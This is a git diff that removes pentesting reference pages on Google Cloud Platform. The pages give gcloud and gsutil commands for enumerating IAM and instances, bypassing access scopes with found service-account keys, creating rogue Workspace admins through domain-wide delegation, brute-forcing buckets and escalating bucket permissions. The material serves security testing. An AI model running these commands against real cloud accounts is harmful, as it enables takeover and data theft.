intentionally applied to an instance. If we're lucky, we'll stumble over an insecure application, an admin interface with a default password, or anything else we can exploit. - -[Firewall rules](https://cloud.google.com/vpc/docs/firewalls) can be applied to instances via the following methods: - -* [Network tags](https://cloud.google.com/vpc/docs/add-remove-network-tags) -* [Service accounts](https://cloud.google.com/vpc/docs/firewalls#serviceaccounts) -* All instances within a VPC - -Unfortunately, there isn't a simple `gcloud` command to spit out all Compute Instances with open ports on the internet. You have to connect the dots between firewall rules, network tags, services accounts, and instances. - -We've automated this completely using [this python script](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp\_firewall\_enum) which will export the following: - -* CSV file showing instance, public IP, allowed TCP, allowed UDP -* nmap scan to target all instances on ports ingress allowed from the public internet (0.0.0.0/0) -* masscan to target the full TCP range of those instances that allow ALL TCP ports from the public internet (0.0.0.0/0) - -## Enumeration - -### Automatic Tools - -* [**https://github.com/carlospolop/purplepanda**](https://github.com/carlospolop/purplepanda): Python script to enumerate resources and find privesc paths -* [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_enum:](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_enum) Bash script to enumerate a GCP environment using gcloud cli and saving the results in -* [https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation:](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation) Scripts to enumerate high IAM privileges and to escalate privileges in GCP abusing them (I couldn’t make run the enumerate script) -* [https://github.com/lyft/cartography:](https://github.com/lyft/cartography) Tool to enumerate and print in a graph resources and relations of different cloud platforms -* [https://github.com/RyanJarv/awesome-cloud-sec:](https://github.com/RyanJarv/awesome-cloud-sec) This is a list of cloud security tools - -### IAM - -| Description | Command | -| ---------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------ | -| List **roles** | `gcloud iam roles list --filter='etag:AA=='` | -| Get **description** and permissions of a role | gcloud iam roles describe roles/container.admin | -| Get iam **policy** of a **organisation** | `gcloud organizations get-iam-policy` | -| Get iam **policy** of a **project** | `gcloud projects get-iam-policy ` | -| Get iam **policy** of a **folder** | `gcloud resource-manager folders get-iam-policy` | -| Get **members** of a **group** | `gcloud identity groups memberships search-transitive-memberships --group-email=email@group.com` | -| Get **permissions** of a **role** | `gcloud iam roles describe roles/accessapproval.approver` | -| [**Testable permissions**](https://cloud.google.com/iam/docs/reference/rest/v1/permissions/queryTestablePermissions) on a resource | `gcloud iam list-testable-permissions --filter "NOT apiDisabled: true` | -| List of **grantable** **roles** for a resource | `gcloud iam list-grantable-roles ` | -| List **custom** **roles** on a project | `gcloud iam roles list --project $PROJECT_ID` | -| List **service accounts** | `gcloud iam service-accounts list` | - -## Unauthenticated Attacks - -{% content-ref url="gcp-buckets-brute-force-and-privilege-escalation.md" %} -[gcp-buckets-brute-force-and-privilege-escalation.md](gcp-buckets-brute-force-and-privilege-escalation.md) -{% endcontent-ref %} - -#### Phishing - -You could **OAuth phish** a user with high privileges. - -#### Dorks - -* **Github**: auth\_provider\_x509\_cert\_url extension:json - -## Generic GCP Security Checklists - -* [Google Cloud Computing Platform CIS Benchmark](https://www.cisecurity.org/cis-benchmarks/) -* [https://github.com/doitintl/secure-gcp-reference](https://github.com/doitintl/secure-gcp-reference) - -## Local Privilege Escalation / SSH Pivoting - -Supposing that you have compromised a VM in GCP, there are some **GCP privileges** that can allow you to **escalate privileges locally, into other machines and also pivot to other VMs**: - -{% content-ref url="gcp-local-privilege-escalation-ssh-pivoting.md" %} -[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md) -{% endcontent-ref %} - -If you have found some [**SSRF vulnerability in a GCP environment check this page**](../../pentesting-web/ssrf-server-side-request-forgery/#6440). - -## GCP Post Exploitation - -### GCP Interesting Permissions - -The most common way once you have obtained some cloud credentials of has compromised some service running inside a cloud is to **abuse miss-configured privileges** the compromised account may have. So, the first thing you should do is to enumerate your privileges. - -Moreover, during this enumeration, remember that **permissions can be set at the highest level of "Organization"** as well. - -{% content-ref url="gcp-interesting-permissions/" %} -[gcp-interesting-permissions](gcp-interesting-permissions/) -{% endcontent-ref %} - -### Bypassing access scopes - -When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the computing instance (VM) will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. However, you might be able to **bypass** this limitation and exploit the permissions the compromised account has. - -The **best way to bypass** this restriction is either to **find new credentials** in the compromised host, to **find the service key to generate an OUATH token** without restriction or to **jump to a different VM less restricted**. - -**Pop another box** - -It's possible that another box in the environment exists with less restrictive access scopes. If you can view the output of `gcloud compute instances list --quiet --format=json`, look for instances with either the specific scope you want or the **`auth/cloud-platform`** all-inclusive scope. - -Also keep an eye out for instances that have the default service account assigned (`PROJECT_NUMBER-compute@developer.gserviceaccount.com`). - -**Find service account keys** - -Google states very clearly [**"Access scopes are not a security mechanism… they have no effect when making requests not authenticated through OAuth"**](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam). - -Therefore, if you **find a** [**service account key**](https://cloud.google.com/iam/docs/creating-managing-service-account-keys) stored on the instance you can bypass the limitation. These are **RSA private keys** that can be used to authenticate to the Google Cloud API and **request a new OAuth token with no scope limitations**. - -Check if any service account has exported a key at some point with: - -```bash -for i in $(gcloud iam service-accounts list --format="table[no-heading](email)"); do - echo Looking for keys for $i: - gcloud iam service-accounts keys list --iam-account $i -done -``` - -These files are **not stored on a Compute Instance by default**, so you'd have to be lucky to encounter them. The default name for the file is `[project-id]-[portion-of-key-id].json`. So, if your project name is `test-project` then you can **search the filesystem for `test-project*.json`** looking for this key file. - -The contents of the file look something like this: - -```json -{ -"type": "service_account", -"project_id": "[PROJECT-ID]", -"private_key_id": "[KEY-ID]", -"private_key": "-----BEGIN PRIVATE KEY-----\n[PRIVATE-KEY]\n-----END PRIVATE KEY-----\n", -"client_email": "[SERVICE-ACCOUNT-EMAIL]", -"client_id": "[CLIENT-ID]", -"auth_uri": "https://accounts.google.com/o/oauth2/auth", -"token_uri": "https://accounts.google.com/o/oauth2/token", -"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs", -"client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/[SERVICE-ACCOUNT-EMAIL]" -} -``` - -Or, if **generated from the CLI** they will look like this: - -```json -{ -"name": "projects/[PROJECT-ID]/serviceAccounts/[SERVICE-ACCOUNT-EMAIL]/keys/[KEY-ID]", -"privateKeyType": "TYPE_GOOGLE_CREDENTIALS_FILE", -"privateKeyData": "[PRIVATE-KEY]", -"validAfterTime": "[DATE]", -"validBeforeTime": "[DATE]", -"keyAlgorithm": "KEY_ALG_RSA_2048" -} -``` - -If you do find one of these files, you can tell the **`gcloud` command to re-authenticate** with this service account. You can do this on the instance, or on any machine that has the tools installed. - -```bash -gcloud auth activate-service-account --key-file [FILE] -``` - -You can now **test your new OAuth token** as follows: - -```bash -TOKEN=`gcloud auth print-access-token` -curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN -``` - -You should see `https://www.googleapis.com/auth/cloud-platform` listed in the scopes, which means you are **not limited by any instance-level access scopes**. You now have full power to use all of your assigned IAM permissions. - -### Service account impersonation - -Impersonating a service account can be very useful to **obtain new and better privileges**. - -There are three ways in which you can [impersonate another service account](https://cloud.google.com/iam/docs/understanding-service-accounts#impersonating\_a\_service\_account): - -* Authentication **using RSA private keys** (covered [above](./#bypassing-access-scopes)) -* Authorization **using Cloud IAM policies** (covered [here](broken-reference/)) -* **Deploying jobs on GCP services** (more applicable to the compromise of a user account) - -### Granting access to management console - -Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**. - -To **grant** the primitive role of **Owner** to a generic "@gmail.com" account, though, you'll need to **use the web console**. `gcloud` will error out if you try to grant it a permission above Editor. - -You can use the following command to **grant a user the primitive role of Editor** to your existing project: - -```bash -gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor -``` - -If you succeeded here, try **accessing the web interface** and exploring from there. - -This is the **highest level you can assign using the gcloud tool**. - -### Spreading to Workspace via domain-wide delegation of authority - -[**Workspace**](https://gsuite.google.com) is Google's c**ollaboration and productivity platform** which consists of things like Gmail, Google Calendar, Google Drive, Google Docs, etc. - -**Service accounts** in GCP can be granted the **rights to programatically access user data** in Workspace by impersonating legitimate users. This is known as [domain-wide delegation](https://developers.google.com/admin-sdk/reports/v1/guides/delegation). This includes actions like **reading** **email** in GMail, accessing Google Docs, and even creating new user accounts in the G Suite organization. - -Workspace has [its own API](https://developers.google.com/gsuite/aspects/apis), completely separate from GCP. Permissions are granted to Workspace and **there isn't any default relation between GCP and Workspace**. - -However, it's possible to **give** a service account **permissions** over a Workspace user. If you have access to the Web UI at this point, you can browse to **IAM -> Service Accounts** and see if any of the accounts have **"Enabled" listed under the "domain-wide delegation" column**. The column itself may **not appear if no accounts are enabled** (you can read the details of each service account to confirm this). As of this writing, there is no way to do this programatically, although there is a [request for this feature](https://issuetracker.google.com/issues/116182848) in Google's bug tracker. - -To create this relation it's needed to **enable it in GCP and also in Workforce**. - -#### Test Workspace access - -To test this access you'll need the **service account credentials exported in JSON** format. You may have acquired these in an earlier step, or you may have the access required now to create a key for a service account you know to have domain-wide delegation enabled. - -This topic is a bit tricky… your service account has something called a "client\_email" which you can see in the JSON credential file you export. It probably looks something like `account-name@project-name.iam.gserviceaccount.com`. If you try to access Workforce API calls directly with that email, even with delegation enabled, you will fail. This is because the Workforce directory will not include the GCP service account's email addresses. Instead, to interact with Workforce, we need to actually impersonate valid Workforce users. - -What you really want to do is to **impersonate a user with administrative access**, and then use that access to do something like **reset a password, disable multi-factor authentication, or just create yourself a shiny new admin account**. - -Gitlab've created [this Python script](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp\_misc/blob/master/gcp\_delegation.py) that can do two things - list the user directory and create a new administrative account. Here is how you would use it: - -```bash -# Validate access only -./gcp_delegation.py --keyfile ./credentials.json \ - --impersonate steve.admin@target-org.com \ - --domain target-org.com - -# List the directory -./gcp_delegation.py --keyfile ./credentials.json \ - --impersonate steve.admin@target-org.com \ - --domain target-org.com \ - --list - -# Create a new admin account -./gcp_delegation.py --keyfile ./credentials.json \ - --impersonate steve.admin@target-org.com \ - --domain target-org.com \ - --account pwned -``` - -You can try this script across a range of email addresses to impersonate **various** **users**. Standard output will indicate whether or not the service account has access to Workforce, and will include a **random password for the new admin accoun**t if one is created. - -If you have success creating a new admin account, you can log on to the [Google admin console](https://admin.google.com) and have full control over everything in G Suite for every user - email, docs, calendar, etc. Go wild. - -### Looting - -Another promising way to **escalate privileges inside the cloud is to enumerate as much sensitive information as possible** from the services that are being used. Here you can find some enumeration recommendations for some GCP services, but more could be used so feel free to submit PRs indicating ways to enumerate more services: - -{% hint style="info" %} -Note that you can enumerate most resources with `list` (list items of that type), `describe` (describe parent and children items) and `get-iam-policy` (get policy attached to that specific resource). -{% endhint %} - -There is a gcloud API endpoint that aims to **list all the resources the accessible from the used user accoun**t, it's in alpha bet and only supports a couple of resources, but maybe in the future you can list all you have access to with it: [https://helpmanual.io/man1/gcloud\_alpha\_resources\_list/](https://helpmanual.io/man1/gcloud\_alpha\_resources\_list/) - -{% content-ref url="gcp-buckets-enumeration.md" %} -[gcp-buckets-enumeration.md](gcp-buckets-enumeration.md) -{% endcontent-ref %} - -{% content-ref url="gcp-compute-enumeration.md" %} -[gcp-compute-enumeration.md](gcp-compute-enumeration.md) -{% endcontent-ref %} - -{% content-ref url="gcp-network-enumeration.md" %} -[gcp-network-enumeration.md](gcp-network-enumeration.md) -{% endcontent-ref %} - -{% content-ref url="gcp-kms-and-secrets-management-enumeration.md" %} -[gcp-kms-and-secrets-management-enumeration.md](gcp-kms-and-secrets-management-enumeration.md) -{% endcontent-ref %} - -{% content-ref url="gcp-databases-enumeration.md" %} -[gcp-databases-enumeration.md](gcp-databases-enumeration.md) -{% endcontent-ref %} - -{% content-ref url="gcp-serverless-code-exec-services-enumeration.md" %} -[gcp-serverless-code-exec-services-enumeration.md](gcp-serverless-code-exec-services-enumeration.md) -{% endcontent-ref %} - -{% content-ref url="gcp-looting.md" %} -[gcp-looting.md](gcp-looting.md) -{% endcontent-ref %} - -### Persistance - -{% content-ref url="gcp-persistance.md" %} -[gcp-persistance.md](gcp-persistance.md) -{% endcontent-ref %} - -## Capture gcloud, gsutil... network - -```bash -gcloud config set proxy/address 127.0.0.1 -gcloud config set proxy/port 8080 -gcloud config set proxy/type http -gcloud config set auth/disable_ssl_validation True - -# If you don't want to completely disable ssl_validation use: -gcloud config set core/custom_ca_certs_file cert.pem - -# Back to normal -gcloud config unset proxy/address -gcloud config unset proxy/port -gcloud config unset proxy/type -gcloud config unset auth/disable_ssl_validation -gcloud config unset core/custom_ca_certs_file -``` - -## References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md b/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md deleted file mode 100644 index a95a44ad6..000000000 --- a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md +++ /dev/null @@ -1,76 +0,0 @@ -# GCP - Buckets: Public Assets Brute-Force & Discovery, & Buckets Privilege Escalation - -## GCP - Buckets: Public Assets Brute-Force & Discovery, & Buckets Privilege Escalation - -
- -Support HackTricks and get benefits! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## Public Assets Discovery - -One way to discover public cloud resources that belongs to a company is to scrape their webs looking for them. Tools like [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) will scrape the web an search for **links to public cloud resources** (in this case this tools searches `['amazonaws.com', 'digitaloceanspaces.com', 'windows.net', 'storage.googleapis.com', 'aliyuncs.com']`) - -Note that other cloud resources could be searched for and that some times these resources are hidden behind **subdomains that are pointing them via CNAME registry**. - -## Public Resources Brute-Force - -### Buckets, Firebase, Apps & Cloud Functions - -* [https://github.com/initstring/cloud\_enum](https://github.com/initstring/cloud\_enum): This tool in GCP brute-force Buckets, Firebase Realtime Databases, Google App Engine sites, and Cloud Functions -* [https://github.com/0xsha/CloudBrute](https://github.com/0xsha/CloudBrute): This tool in GCP brute-force Buckets and Apps. - -### Buckets - -As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...). - -![](<../../.gitbook/assets/image (618) (3).png>) - -The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names: - -* [https://github.com/RhinoSecurityLabs/GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute) - -## Privilege Escalation - -If the bucket policy allowed either β€œallUsers” or β€œallAuthenticatedUsers” to **write to their bucket policy** (the **storage.buckets.setIamPolicy** permission)**,** then anyone can modify the bucket policy and grant himself full access. - -### Check Permissions - -There are 2 ways to check the permissions over a bucket. The first one is to ask for them by making a request to `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam` or running `gsutil iam get gs://BUCKET_NAME`. - -However, if your user (potentially belonging to allUsers or allAuthenticatedUsers") doesn't have permissions to read the iam policy of the bucket (storage.buckets.getIamPolicy), that won't work. - -The other option which will always work is to use the testPermissions endpoint of the bucket to figure out if you have the specified permission, for example accessing: `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update` - -### Escalating - -With the β€œgsutil” Google Storage CLI program, we can run the following command to grant β€œallAuthenticatedUsers” access to the β€œStorage Admin” role, thus **escalating the privileges we were granted** to the bucket: - -``` -gsutil iam ch group:allAuthenticatedUsers:admin gs://BUCKET_NAME -``` - -One of the main attractions to escalating from a LegacyBucketOwner to Storage Admin is the ability to use the β€œstorage.buckets.delete” privilege. In theory, you could **delete the bucket after escalating your privileges, then you could create the bucket in your own account to steal the name**. - -## References - -* [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/) - -
- -Support HackTricks and get benefits! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/gcp-security/gcp-buckets-enumeration.md b/cloud-security/gcp-security/gcp-buckets-enumeration.md deleted file mode 100644 index da44e3659..000000000 --- a/cloud-security/gcp-security/gcp-buckets-enumeration.md +++ /dev/null @@ -1,106 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -Default configurations permit read access to storage. This means that you may **enumerate ALL storage buckets in the project**, including **listing** and **accessing** the contents inside. - -This can be a MAJOR vector for privilege escalation, as those buckets can contain secrets. - -The following commands will help you explore this vector: - -```bash -# List all storage buckets in project -gsutil ls - -# Get detailed info on all buckets in project -gsutil ls -L - -# List contents of a specific bucket (recursive, so careful!) -gsutil ls -r gs://bucket-name/ - -# Cat the context of a file without copying it locally -gsutil cat gs://bucket-name/folder/object - -# Copy an object from the bucket to your local storage for review -gsutil cp gs://bucket-name/folder/object ~/ -``` - -If you get a permission denied error listing buckets you may still have access to the content. So, now that you know about the name convention of the buckets you can generate a list of possible names and try to access them: - -```bash -for i in $(cat wordlist.txt); do gsutil ls -r gs://"$i"; done -``` - -## Search Open Buckets - -With the following script [gathered from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_buckets.sh) you can find all the open buckets: - -```bash -#!/bin/bash - -############################ -# Run this tool to find buckets that are open to the public anywhere -# in your GCP organization. -# -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - for bucket in $(gsutil ls -p $proj); do - echo " $bucket" - ACL="$(gsutil iam get $bucket)" - - all_users="$(echo $ACL | grep allUsers)" - all_auth="$(echo $ACL | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $bucket" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] Open to all authenticated users: $bucket" - fi - done - -``` - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-compute-enumeration.md b/cloud-security/gcp-security/gcp-compute-enumeration.md deleted file mode 100644 index efe25c13d..000000000 --- a/cloud-security/gcp-security/gcp-compute-enumeration.md +++ /dev/null @@ -1,171 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Compute instances - -It would be interesting if you can **get the zones** the project is using and the **list of all the running instances** and details about each of them. - -The details may include: - -* **Network info**: Internal and external IP addresses, network and subnetwork names and security group -* Custom **key/values in the metadata** of the instance -* **Protection** information like `shieldedInstanceConfig` and `shieldedInstanceIntegrityPolicy` -* **Screenshot** and the **OS** running -* Try to **ssh** into it and try to **modify** the **metadata** - -```bash -# Get list of zones -# It's interesting to know which zones are being used -gcloud compute regions list | grep -E "NAME|[^0]/" - -# List compute instances & get info -gcloud compute instances list -gcloud compute instances describe --project -gcloud compute instances get-screenshot --project -gcloud compute instances os-inventory list-instances #Get OS info of instances (OS Config agent is running on instances) - -# Try to SSH & modify metadata -gcloud compute ssh -gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt -``` - -For more information about how to **SSH** or **modify the metadata** of an instance to **escalate privileges** check this page: - -{% content-ref url="gcp-local-privilege-escalation-ssh-pivoting.md" %} -[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md) -{% endcontent-ref %} - -## Custom Metadata - -Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts. This can be obtained using the `describe` method from a command in the previous section, but it could also be retrieved from the inside of the instance accessing the metadata endpoint. - -```bash -# view project metadata -curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true&alt=text" \ - -H "Metadata-Flavor: Google" - -# view instance metadata -curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text" \ - -H "Metadata-Flavor: Google" -``` - -## Serial Console Logs - -Compute instances may be **writing output from the OS and BIOS to serial ports**. Serial console logs may expose **sensitive information** from the system logs which low privileged user may not usually see, but with the appropriate IAM permissions you may be able to read them. - -You can use the following [gcloud command](https://cloud.google.com/sdk/gcloud/reference/compute/instances/get-serial-port-output) to query the serial port logs: - -``` -gcloud compute instances get-serial-port-output instance-name \ - --port port \ - --start start \ - --zone zone -``` - -``` -$ gcloud compute images export --image test-image \ - --export-format qcow2 --destination-uri [BUCKET] -``` - -You can then [export](https://cloud.google.com/sdk/gcloud/reference/compute/images/export) the virtual disks from any image in multiple formats. The following command would export the image `test-image` in qcow2 format, allowing you to download the file and build a VM locally for further investigation: - -``` -$ gcloud compute images list --no-standard-images -``` - -## Local Privilege Escalation and Pivoting - -If you compromises a compute instance you should also check the actions mentioned in this page: - -{% content-ref url="gcp-local-privilege-escalation-ssh-pivoting.md" %} -[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md) -{% endcontent-ref %} - -# Images - -## Custom Images - -**Custom compute images may contain sensitive details** or other vulnerable configurations that you can exploit. You can query the list of non-standard images in a project with the following command: - -``` -gcloud compute images list --no-standard-images -``` - -You can then [**export**](https://cloud.google.com/sdk/gcloud/reference/compute/images/export) **the virtual disks** from any image in multiple formats. The following command would export the image `test-image` in qcow2 format, allowing you to download the file and build a VM locally for further investigation: - -```bash -gcloud compute images export --image test-image \ - --export-format qcow2 --destination-uri [BUCKET] - -# Execute container inside a docker -docker run --rm -ti gcr.io//secret:v1 sh -``` - -More generic enumeration: - -```bash -gcloud compute images list -gcloud compute images list --project windows-cloud --no-standard-images #non-Shielded VM Windows Server images -gcloud compute images list --project gce-uefi-images --no-standard-images #available Shielded VM images, including Windows images -``` - -## Custom Instance Templates - -An [instance template](https://cloud.google.com/compute/docs/instance-templates/) defines instance properties to help deploy consistent configurations. These may contain the same types of sensitive data as a running instance's custom metadata. You can use the following commands to investigate: - -```bash -# List the available templates -$ gcloud compute instance-templates list - -# Get the details of a specific template -$ gcloud compute instance-templates describe [TEMPLATE NAME] -``` - -# More Enumeration - -| Description | Command | -| ---------------------- | --------------------------------------------------------------------------------------------------------- | -| **Stop** an instance | `gcloud compute instances stop instance-2` | -| **Start** an instance | `gcloud compute instances start instance-2` | -| **Create** an instance | `gcloud compute instances create vm1 --image image-1 --tags test --zone "" --machine-type f1-micro` | -| **Download** files | `gcloud compute copy-files example-instance:~/REMOTE-DIR ~/LOCAL-DIR --zone us-central1-a` | -| **Upload** files | `gcloud compute copy-files ~/LOCAL-FILE-1 example-instance:~/REMOTE-DIR --zone us-central1-a` | -| List all **disks** | `gcloud compute disks list` | -| List all disk types | `gcloud compute disk-types list` | -| List all **snapshots** | `gcloud compute snapshots list` | -| **Create** snapshot | `gcloud compute disks snapshot --snapshotname --zone $zone` | - - -
